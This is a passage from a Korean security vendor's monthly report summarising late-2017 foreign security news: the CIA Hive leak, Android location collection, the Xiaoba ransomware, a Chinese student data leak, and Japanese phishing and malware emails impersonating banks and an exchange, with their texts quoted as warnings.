31 04 해외보안동향 하지만, 백그라운드에서이멀웨어는인증후가짜웹사이트를호스팅하는웹서버와통신할수있게된다. 이후멀웨어 관련트래픽을안전한 VPN 연결을통해 숨겨진 CIA 서버인 Blot 로포워딩한다. 이후이 Blot 서버는트래픽을 Honeycomb 라는임플란트운영관리게이트웨이로보낸다. 네트워크관리자들의탐지를피하기위해서, 이멀웨어임플란트는 Kaspersky Lab 의가짜디지털인증서를사용한다. 위키리크스는 CIA 는기존엔티티들을가장해임플란트들의인증을위한디지털인증서를생성합니다. 소스코드에 포함된샘플들 3 개는 Kaspersky Lab 의가짜인증서를빌드합니다. 고밝혔다. 또한 Project Hive 의소스코드를 공개해누구나볼수있도록했다. Vault 8 시리즈에서공개된소스코드는 CIA 가제어하는서버에서실행하도록설계된소프트웨어만을포함합니다. 또한위키리크스는다른사람들이악용할소지가있는어떠한제로데이나보안취약점들도공개하지않겠다고밝혔다. [ 출처 ]

32 04 해외보안동향 급격히증가하고있는새로운 IoT 봇넷, 인터넷중단위협해 Google Collects Android Location Data Even When Location Service Is Disabled Quartz 가실시한조사에따르면, 구글이올해초부터위치서비스가완전히비활성화된경우라할지라도모든 안드로이드기기의위치데이터를수집하고있던것으로나타났다. 위치정보수집을위해서는, 안드로이드기기에서특정앱을사용하지않아도, 위치서비스옵션을켜지않아도, 심지어 SIM 카드가끼워져있지않은상황에서도기기에인터넷만연결되어있으면된다. 안드로이드스마트폰들이가까운기지국의주소를수집하고, 이데이터는가까운기지국 3개이상의데이터를이용해기기의위치를확인하기위해널리사용되는기술인 기지국삼각측량 (Cell Tower Triangulation) 에이용되었을수있다. 안드로이드기기가새로운기지국의범위에들어올때마다, 기기는기지국의주소를수집하고기기가 WiFi 네트워크에 연결되었거나셀룰러데이터통신이가능할때이데이터를구글에보냈다. 위치데이터수집을담당하는컴포넌트는 OS 의푸시알림및메시지를관리하는안드로이드의코어 Firebase Cloud Messaging 서비스에존재했습니다. 이는비활성화가불가능하며, 사용자가앱을설치하는데의존하지않는다. 사용자가스마트폰을공장초기화하거나 SIM 카드를제거할경우에도비활성화되지않는다. Quartz 가구글에이이슈에대한코멘트를요청하자, 구글의대변인은 우리는메시지전달속도및성능을향상시키기위해 Cell ID 코드를추가신호로사용하기시작했습니다. 고밝혔다. 기지국의데이터가어떻게구글의메시지전달을향상시켰는지는알려지지않았지만, 분명한사실은구글의 OS 가사용자의위치데이터를수집하고있었고, 이는명백한사용자의개인정보침해라볼수있다. 구글은위치공유에대한개인정보보호정책에조차구글의서비스를사용하는기기로부터위치정보를수집하지만, 모든위치서비스가비활성화되었을경우에도데이터를수집한다는부분은명시하지않았다. 또한이위치정보공유는특정안드로이드폰모델이나제조사에국한되지않았다. 구글은모든안드로이드기기들에서기지국정보를수집하고있었던것으로보인다. 구글은여태껏수집한위치데이터를아직까지사용하거나저장하지않았으며이제더이상데이터를수집하지않을예정이라고밝혔다. 구글은안드로이드폰들이이번달말이후로는기지국의위치데이터를수집및전송하지않을것이라고밝혔다. [ 출처 ] tracking.html 30

33 04 해외보안동향 2. 중국 중국사용자를타깃으로하는랜섬웨어발견! 랜섬웨어는주로해외의랜섬웨어를기반으로한다. 하지만최근, 중국에서중국에서개발된것으로추정되는수준높은 랜섬웨어가발견되었다. 이랜섬웨어는동작하는매단계들이모두중국인들을타깃으로정교하게제작되어있는것이 특징이며, 금전적인이득을목적으로하고있다. 해당랜섬웨어의이름은 "Xiaoba" 로, 유명 SW 를위장하여유포된다. 사용자를속이기위하여, 랜섬웨어가실행될때, " 페이지로딩 " 이라는팝업창을띄우며, 이를통해사용자들로하여금정상 SW 가설치되는과정인것처럼속인다. 하지만백그라운드에서는사용자의파일을암호화하며, 암호화후에는파일뒤에.Xiaoba 확장자를추가한다. "Xiaoba" 랜섬웨어가중국에서만들어졌다고추정되는데에는여러가지이유가있다. 우선, 랜섬노트가중국어로되어 있을뿐만아니라, 링크클릭만으로랜섬머니를지불할수있도록제작하였다. 또한사용자자신이임의로파일명을 수정하면복구가불가능할수있다는내용의바이두링크도추가하였다. 31

34 04 해외보안동향 "Xiaoba" 랜섬웨어는사용자 PC 를감염시킨직후부터 200 초의카운트다운을시작하며, 해당시간내에랜섬머니를 지불하지않는다면암호화된파일들을모두삭제해버린다. 그렇기때문에 Xiaoba 랜섬웨어에감염이되었다면, 정해진시간에랜섬머니를지불하거나, PC 를종료후하드디스크백업파일을분리시켜야한다. 하지만감염된사용자입장에서는해당경고를지나칠수있기때문에 200 초후암호화시킨파일들을모두삭제후에 "Xiaoba" 는중요공지라는제목의팝업창을띄워암호화된파일이모두삭제되었음을알려주며사용자를농락한다. [ 출처 ] 32

35 04 해외보안동향 일부고등학교에서장학금명단을게재하는과정에서학생개인정보유출발생 최근강소, 황서, 샨서성등일부고등학교의장학생명단이유출되었다. 이번에유출된명단에는이름, 학과, 전공, 학번, 성멸, 민족, 입학년도및신분증번호가포함되어있다. 33

36 04 해외보안동향 신분증번호를함께공개하는하는이유는장학금을받는학생들의명단을외부에게재할때동명이인의가능성을 배제하며, 장학금수령자를정확하게판단하기위해서라고학교측들은답변하였다. 이후이런학교측은장학금수령학생들의공지방법을변경하는방법을모색해보겠다고답하였다. [ 출처 ] 34

37 04 해외보안동향 3. 일본 bitflyer 사칭하는피싱메일, 동결 휴면 되지않도록확인도 ( 피싱대책협의회 ) 피싱대책협의회는 11 월6일, bitflyer 를사칭하는피싱메일이나돌고있다고해서주의를당부했다. 확인되고있는피싱메일은 bitflyer 본인인증서비스 라는제목으로시스템의안전성이갱신되었기때문에계정이 동결 휴면 되지않도록인증이필요하다고설명하며링크를클릭하게만들고자한다. 확인된피싱사이트의 URL 은아래와같다. 안녕하십니까? bitflyer 시스템이안전성갱신이되었기때문에, 고객님들은계정이동결 휴면되지않도록즉시계정을인증해주십시오. 아래의페이지에서등록을계속해주십시오. 확인된피싱메일 35

38 04 해외보안동향 확인된피싱사이트 확인된피싱사이트 ( 화면이동 1) 확인된피싱사이트 ( 화면이동 1) 이협의회에따르면 11 월6일 14 시시점에서피싱사이트는가동중이며, JPCERT/CC 에사이트폐쇄를위한조사를의뢰중이라고한다. 또한유사한피싱사이트가공개되었을가능성이있기때문에계속해서주의를호소하고있다. 게다가이와같은피싱사이트에서계정정보 ( 메일주소, 패스워드 ), 비밀번호, Web 메일패스워드를절대로입력하지않도록호소하고있다. [ 출처 ] 36

39 04 해외보안동향 미즈호은행과 JCB 를사칭하는바이러스메일이확산중, 경시청이주의를호소 미즈호은행을사칭하는악성코드메일이확산중이라며경시청사이버범죄대책과가 Twitter 계정을통해서주의를 호소하고있다. 사이버범죄대책과 바이러스를다운로드시키는메일이확산중. 제목은 미즈호은행카드론 임시신청의심사결과연락 입니다. 실재하고있는회사를가장하고있는데, 본문내에있는링크를클릭하여다운로드되는파일은바이러스입니다. 주의해주십시오. 15: 年 11 月 14 日 메일의송신일은 11 월 14 일이고, 제목은 미즈호은행카드론 임시신청의심사결과연락 이다. 미즈호은행카드론의 임시신청심사결과를통지하는듯한내용으로되어있으며기재된링크를클릭하면바이러스가심어진 ZIP 파일을 다운로드하는사이트에접속된다. [ 송신일 ] 2017 년 11 월 14 일 37

40 04 해외보안동향 [ 제목 ] 미즈호은행카드론 임시신청의심사결과연락 [ 첨부파일 ] [ 본문 ] 미즈호은행카드론 임시신청의심사결과연락미즈호은행을이용해주셔서감사합니다. 이번에 미즈호은행카드론 을신청해주셔서감사합니다. 아래의 URL 에서임시신청심사결과를확인해주십시오. * 확인시에는임시신청시에등록하신패스워드가필요합니다. > 일시적인임시등록을위한패스워드 ( ) ( ) 복수의수상한사이트의 zip 파일에대한링크 *URL 을클릭하시면보증회사인 오리엔트코포레이션사이트로이동됩니다. 주의사항 * 심사결과에따라서는희망에맞지않을경우가있으니양해부탁드립니다. * 죄송합니다만이메일에대한답변은받지않습니다. 문의처 [ 미즈호은행카드론전용다이얼 ] 리다이얼 : < 접수기한 > 월요일 ~ 금요일 9시00 분 ~20 시00 분 *12 월31 일 ~1월 3일, 공휴일, 대체휴일제외미즈호은행을사칭하는바이러스메일 (JC3 의주의정보페이지에서 ) 이외에도 JCB 를사칭하는바이러스메일이같은날확산되고있다는사실을확인했다. 메일제목은 JCB 카드 2017 년11 월14 일분입금내용확정의안내 이다. 11 월14 일분의입금내용확정을통지하도록보이게만들어이쪽에서도메일본문에기재된링크를클릭하면바이러스 ZIP 파일을다운로드하는사이트에접속된다. JCB 에따르면, 바이러스메일본문에유저의성명이기재되지않고있으며카드명칭 ( 예 : ANA ToMe CARD PASMO 등 ) 에서시작되고있는것이특징이라고한다. 또한이회사에서의정규메일의본문에는 ( 스마트폰클라이언트의 APP 가메인터넌스와업그레이드를위해 MyJCB 어플 ( 무료 ) 은최신청구정보의문의를이용하지못할지도모릅니다. 개인 PC 에서로그인하여조사해주십시오. 불편을끼쳐드려죄송합니다. 양해부탁드리겠습니다.) 라는기재는없다며주의를당부하고있다. [ 출처 ] 38

41 04 해외보안동향 시큐리티소프트도입을촉구하는은행에서온가짜메일 실재하는기업명을악용 라쿠텐 ( 楽天 ) 은행으로위장하여시큐어프레인소프트를설치시키는명목으로수상한웹사이트로유도하는메일공격이 확인되었다. 경시청과일본사이버범죄대책센터, 시큐어브레인이메일에대한주의를권고하고있다. 메일의제목에는 중요 부정송금 / 피싱대책소프트 PhishWall 프리미엄 제공개시에대해서 라고적혀있고, 라쿠텐은행이시큐어브레인제의시큐리티소프트 PhishWall 프리미엄 을제공하고있는것처럼가장하는내용이기재되어있다. 게다가 무료로이용하시는서비스이기때문에꼭설치하여이용해주시길부탁드리겠습니다 라고수신자에게유도하여상세한정보확인처로링크가심어져있다. 일본사이버범죄대책센터에따르면, 링크는복수의수상한사이트 PDF 를가장한파일이라고한다. 시큐어브레인은 바이러스에감염될우려가있어링크를절대로클릭하지말고메일을파기하도록조언하고있다. PhishWall 프리미엄은온라인뱅킹의부정송금이나가짜사이트의대책제품으로금융기관을경유하여이용자에게 제공되고있다. 시큐어브레인이공개하고있는도입처금융기관은 10 월 16 일시점에서 172 개조직에달하지만, 라쿠텐은행은리스트업되어있지않다. 송신일 2017 년11 월28일 제목 중요 부정송금 / 피싱대책소프트 PhishWall 프리미엄 제공개시에대해서 첨부파일 본문 존경하는고객님께 39

42 04 해외보안동향 항상라쿠텐은행을이용해주셔서대단히감사합니다. 라구텐은행에서는 2017 년11월 29 일 ( 수 ) 부터당행홈페이지와 도긴 ( 道銀 ) 다이렉트서비스 를보다안심하고이용하실수있도록부정송금 / 피싱대책소프트 PhishWall 프리미엄 의제공을개시했습니다. 무료로이용하실수있는서비스이기때문에, 꼭설치하여이용해주시길부탁드리겠습니다. 그리고이미타사사이트등에서 PhishWall 프리미엄 을설치되어있는경우에는다시설치할필요는없습니다. 더상세한내용은이쪽 ( ) ( ) 복수의수상한사이트 PDF 를가장한파일에대한링크 본메일의어드레스는송신전용입니다. 답변메일의문의는받기어렵기때문에미리양해부탁드리겠습니다. 가짜메일의내용 ( 출처 : 일본사이버범죄대책센터 ) [ 출처 ] 40

43 ( 주 ) 이스트시큐리티 ( 우 ) 서울시서초구반포대로 3 이스트빌딩